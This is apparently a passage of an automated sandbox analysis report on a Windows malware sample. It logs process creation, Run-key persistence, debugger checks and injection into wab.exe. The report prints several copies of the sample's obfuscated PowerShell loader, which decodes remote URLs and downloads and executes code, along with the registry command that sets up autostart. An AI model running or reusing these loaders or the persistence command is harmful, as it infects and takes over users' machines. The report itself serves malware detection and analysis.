Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea 
PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Cabinetted;++$Cabinetted;$Cabinetted=$Cabinetted-1;Function Cert69 ($Forretningsnavn){$Halvmaanedliges=5;$Halvmaanedliges++;For($Phylloscopine81=5; $Phylloscopine81 -lt $Forretningsnavn.Length-1; $Phylloscopine81+=$Halvmaanedliges){$Foreadapt = 'substring';$Slyngblte=$Forretningsnavn.$Foreadapt.Invoke($Phylloscopine81, 1);$Olfactible=$Olfactible+$Slyngblte}$Olfactible;}$uppishness=Cert69 'HypochfavnttDep.ct EkstpEl.dys Bowl: Libe/Snebo/Mornem IndiaBurnes DoomoOverl.ArmatgPolypeProj./ DesiwBeeswp Carp- Pr.va ygnid PanemEtaari AcrinFarad/KlassRT lkue BestcCompriResult Do seKartorKvi,keSupert Havo.Brn erVirusa Other In e ';$Wergilds=$uppishness.split([char]62);$uppishness=$Wergilds[0];$Batiste=Cert69 ' ForeiJurateAk hexMsurk ';$Sjusglas = Cert69 ' Lsni\ CymesNig eyVrtdys RediwNephroNuss wP.eud6Lymph4 Synt\havarWTan aicarponSam rdPol ro Dic.wIonpasAcardPResgso Arguw ReseeAnde rIndseS Frath sarceOmhyglPledglSeric\D plavSrdom1 .ytr.Rekur0St,ld\RepatpAlcoroskarpwUnorte,nglerUnagisIn.erhWifieeBlokel Flo.leuphe.NumereS.irixR,inoeParal ';&($Batiste) (Cert69 'Sterr$SkrivSAllo e Po.ykFe.lmsPos.tt Uncou Di.lr VrkssArgen=.onde$Ps.cheEpit.nBog nvTrla :m.ltew SbefiStrrenJ,rntd.amilisvrvgrGamet ') ;&($Batiste) (Cert69 'Askeb$Ra,gsS Cab,j O,gouSterss hiocgLarl.l GasbaAssems Per,=Cinqu$SarcoSVaabeeLit.ukUnm.nsRetintcompuuSkri,r luttsHanhu+Fravl$RelegS ndejSicyouPropos SplagmildelCr ssaFrotts S.rv ') ;&($Batiste) (Cert69 'Wayl,$CensuL LangeUnme.a llefCimb,wSilkeoBlderrAndelm ntes Fl.e Doku=Unrep Vexed(Afmel( ImaggTomhjwBagtrmHana.i Ev.n KursuwbortviProclnUdkrn3Uover2N.npa_Chinkp DietrJoggioOccupc DetoeDemensPseudsAxost propa-O.bytFLunyi IsoenPSeriorUnhypoTranscHatcheB,shbsolofss ubveItraved Appr=F.rre$Under{EthicP.unstI PhaeDUnpud}tvang),isco.TegucCAntaloU dermA socmP.digaF rtinmelildUkvemLAerosi 
OxygnChloreGitt.)Downh Boble-contrsUnnimp enetlWe biiUndert enfe Payi [Sleigc Ari,hBet aaSkkevr Acid]Un.in3Gevin4 opfi ');&($Batiste) (Cert69 'Krybe$ kretFHomofeRekrnmPol.ttAflydemil in TescaAudioaScenarConnis Kond Til =Disin Angli$Fu,dsL.isexeKontraSold,f KvalwChacro BrygrKaeftmCr.tisArr y[Krysa$ juniLnyanseByggea Sho,fLegemwimpoloVidtlrLakfamDuniesQ,adr.Quak cRespeoA.rusu onen,omictFerth- omkl2C,omp]Erst, ');&($Batiste) (Cert69 ' Unde$ .ircFbraysaKragesKmpehe UnstrBrystuTransmHoved= rrie( AdskT QualeAfgrssIntertUitot-Ra.urP.ompaaCrotctRegnsh npac Semit$c,ltoSDeaccj Tostu,rylls Udskg pseulFalbyaEncrysLi,id)Cereb N.rve-Kam.eA DrifnApperdS.alc Fu te(B.lan[SymboI Oro n ronatBrom,PkvalitScurrrNonfr]Uorga:Toba.:B.ithsUbevgi Forsz SquaeP,eud Scarl-Leucoe .illqCorad Distr8Palli)Manip ') ;if ($Faserum) {.$Sjusglas $Femtenaars;} else {;$Thysen=Cert69 'Ant.cSKogeptReaccaFysiorUnschtCalli-Ing.oBSengei,ircut FrdesSinusTTresirFicu.aCabbanQuonssHjem.f Melle.rbitr Hvae Verti- FidgSStemmoRgto,uWulfer FordcPernieGudst Fors $Unpa,uNitnipHybripDig eiLilyas SherhAlbat

          Persistence and Installation Behavior

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: \KnownDlls32\BitsProxy.dll
          Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run obviously
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6040
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3448
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5797
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2919
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 2592
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5258
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4230
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6480 Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2672 Thread sleep count: 5797 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7092 Thread sleep time: -10145709240540247s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6048 Thread sleep count: 2919 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3060 Thread sleep time: -30000s >= -30000s
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6324 Thread sleep count: 2592 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6392 Thread sleep count: 5258 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3228 Thread sleep time: -12912720851596678s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 652 Thread sleep count: 4230 > 30
          Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Last function: Thread delayed
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread sleep count: Count: 2592 delay: -5
          Source: wscript.exe, 00000000.00000003.2216313154.000001F01DDD5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

          Anti Debugging

          Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: CodeIntegrityInformation
          Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: KernelDebuggerInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 30C0000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 309F948
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla 
,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea 
PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs"
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Cabinetted;++$Cabinetted;$Cabinetted=$Cabinetted-1;Function Cert69 ($Forretningsnavn){$Halvmaanedliges=5;$Halvmaanedliges++;For($Phylloscopine81=5; $Phylloscopine81 -lt $Forretningsnavn.Length-1; $Phylloscopine81+=$Halvmaanedliges){$Foreadapt = 'substring';$Slyngblte=$Forretningsnavn.$Foreadapt.Invoke($Phylloscopine81, 1);$Olfactible=$Olfactible+$Slyngblte}$Olfactible;}$uppishness=Cert69 'HypochfavnttDep.ct EkstpEl.dys Bowl: Libe/Snebo/Mornem IndiaBurnes DoomoOverl.ArmatgPolypeProj./ DesiwBeeswp Carp- Pr.va ygnid PanemEtaari AcrinFarad/KlassRT lkue BestcCompriResult Do seKartorKvi,keSupert Havo.Brn erVirusa Other In e ';$Wergilds=$uppishness.split([char]62);$uppishness=$Wergilds[0];$Batiste=Cert69 ' ForeiJurateAk hexMsurk ';$Sjusglas = Cert69 ' Lsni\ CymesNig eyVrtdys RediwNephroNuss wP.eud6Lymph4 Synt\havarWTan aicarponSam rdPol ro Dic.wIonpasAcardPResgso Arguw ReseeAnde rIndseS Frath sarceOmhyglPledglSeric\D plavSrdom1 .ytr.Rekur0St,ld\RepatpAlcoroskarpwUnorte,nglerUnagisIn.erhWifieeBlokel Flo.leuphe.NumereS.irixR,inoeParal ';&($Batiste) (Cert69 'Sterr$SkrivSAllo e Po.ykFe.lmsPos.tt Uncou Di.lr VrkssArgen=.onde$Ps.cheEpit.nBog nvTrla :m.ltew SbefiStrrenJ,rntd.amilisvrvgrGamet ') ;&($Batiste) (Cert69 'Askeb$Ra,gsS Cab,j O,gouSterss hiocgLarl.l GasbaAssems Per,=Cinqu$SarcoSVaabeeLit.ukUnm.nsRetintcompuuSkri,r luttsHanhu+Fravl$RelegS ndejSicyouPropos SplagmildelCr ssaFrotts S.rv ') ;&($Batiste) (Cert69 'Wayl,$CensuL LangeUnme.a llefCimb,wSilkeoBlderrAndelm ntes Fl.e Doku=Unrep Vexed(Afmel( ImaggTomhjwBagtrmHana.i Ev.n KursuwbortviProclnUdkrn3Uover2N.npa_Chinkp DietrJoggioOccupc DetoeDemensPseudsAxost propa-O.bytFLunyi IsoenPSeriorUnhypoTranscHatcheB,shbsolofss ubveItraved Appr=F.rre$Under{EthicP.unstI PhaeDUnpud}tvang),isco.TegucCAntaloU dermA socmP.digaF rtinmelildUkvemLAerosi 
OxygnChloreGitt.)Downh Boble-contrsUnnimp enetlWe biiUndert enfe Payi [Sleigc Ari,hBet aaSkkevr Acid]Un.in3Gevin4 opfi ');&($Batiste) (Cert69 'Krybe$ kretFHomofeRekrnmPol.ttAflydemil in TescaAudioaScenarConnis Kond Til =Disin Angli$Fu,dsL.isexeKontraSold,f KvalwChacro BrygrKaeftmCr.tisArr y[Krysa$ juniLnyanseByggea Sho,fLegemwimpoloVidtlrLakfamDuniesQ,adr.Quak cRespeoA.rusu onen,omictFerth- omkl2C,omp]Erst, ');&($Batiste) (Cert69 ' Unde$ .ircFbraysaKragesKmpehe UnstrBrystuTransmHoved= rrie( AdskT QualeAfgrssIntertUitot-Ra.urP.ompaaCrotctRegnsh npac Semit$c,ltoSDeaccj Tostu,rylls Udskg pseulFalbyaEncrysLi,id)Cereb N.rve-Kam.eA DrifnApperdS.alc Fu te(B.lan[SymboI Oro n ronatBrom,PkvalitScurrrNonfr]Uorga:Toba.:B.ithsUbevgi Forsz SquaeP,eud Scarl-Leucoe .illqCorad Distr8Palli)Manip ') ;if ($Faserum) {.$Sjusglas $Femtenaars;} else {;$Thysen=Cert69 'Ant.cSKogeptReaccaFysiorUnschtCalli-Ing.oBSengei,ircut FrdesSinusTTresirFicu.aCabbanQuonssHjem.f Melle.rbitr Hvae Verti- FidgSStemmoRgto,uWulfer FordcPernieGudst Fors $Unpa,uNitnipHybripDig eiLilyas SherhAlbatJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "++$skatepark;++$skatepark;$skatepark=$skatepark-1;function quenchlessness ($kineser){$unenterprised=5;$unenterprised++;for($calin=5; $calin -lt $kineser.length-1; $calin+=$unenterprised){$universitetsstillinger = 'substring';$bjorn181=$kineser.$universitetsstillinger.invoke($calin, 1);$windlestrae27=$windlestrae27+$bjorn181}$windlestrae27;}$planteskoles=quenchlessness 'trommhjallst disct egerpabb kskrill:lands/invin/krselba,armrsa psufarcesflakktt.itoi.athoasusc,a vestl begyffum dahinge.d,putwfodbreau,orbkr stscylini betanoppus. tydnitry.ltimpi,/,hyllplejebrfremsofrededwoolsu sugakoldebt lampitndinotar.knmidscse cephdownla.istal myoblsko peribbin tilhscrimi.bill tattaihnoedbn book ';$udenrigsredaktrerne=$planteskoles.split([char]62);$planteskoles=$udenrigsredaktrerne[0];$affattendes62=quenchlessness ' si.ki.acroerestixabear ';$determents = quenchlessness 'ilksc\s,bsis b,mbytalegsflagewavlerobonifwrandp6 synt4ba.om\ hypow dityimidesnnoma,d randorejouwchok sspec,plinneo vandwdri he kn proverrspo,yghjuvene vampls bstlluxem\gaussvmusc 1a,koh.vid,l0ronsa\monebpha.anobarnsw,rimlehenslr overspreouhsaerde .quilaabenl sesq.,rikaeoverfxbaj,rebrusk ';&($affattendes62) (quenchlessness 'gur.e$.ronovcryoganond,lzantcs scriesta.dnagalld ethieale osskamf=regel$congreafpl nerh evus kk:mng.ewmoneyil,mbunforandorienip ebercyclo ') ;&($affattendes62) (quenchlessness 'svejs$ligsydkursnekultitinvese r,plrfuttomhoverel,ngunblodbtramposbushn=ti.ca$aug.sv rigsakampflkultusnon.iegenern horud elmaeforskslovo.+normf$favntdce aseb,tastectopecluckr d,somdragre pakkn lystt armbs ram ') ;&($affattendes62) (quenchlessness ' opl$ kur,cskrivapla.tlbuckhvapproipaafytbint.y biff kolla=s osn alcyo( aspe( chaiggo erwindermpl ini idea pelliwbilliiflyd.n.chis3mon,z2kondo_ces.ipsuiverombroorom.nclivsne mdirsscraistilla 
,esod-bombefkultu kerapjvn nr adelo.ankmcmi.seeretinsreharsalangisuperd nonr=takke$looky{nakkep la.rikonfedhy ro}heth.)subsu.marvecwebbiordnesm ivy mpalerasletbns.romdstikdl hystifoedsnsp.ose coms)preex purch-syr.isskkebpafstelparanitaftktpan.o fuldf[nonpec tumbhs,blia ascaralmon]bunds3 fr d4pseud ');&($affattendes62) (quenchlessness 'nedra$f.rvohtermlapasquvover aind,vr haanth.emmilods s samf micr=scrag torv,$geleec .veraaleurlskrppv incoifyrettsyn.bystil.[brass$camomc p,maaklitolo.kupvnaturipret,t sepayphyco.arbejcch rooombuduuncasnstraftglide-salgs2sakis] arne ');&($affattendes62) (quenchlessness ' mese$overbihjer,m s ftpdestrowithnnge.taddyrkeebukser algoa.pecibforlalbrumsehil.bn.ndtae ve,ss aques mart=ladyk(krligt sophe dat suddebtsketc- buffpfdemia nonst tranhedvin .ncov$ ge,edstrmae tujattyrkeespinur reinm eliecerebnland,tnogets unr.) d,ne reg,b-cinciaelocunopfoedspico syste( plum[b,ackiube knwartyts ivep ranst rgfare.dot]dekat:n nmo:kon esadrenikablizret.me r,kl deter-se,ise i.teqtjera nekro8forly)scori ') ;if ($imponderableness) {.$determents
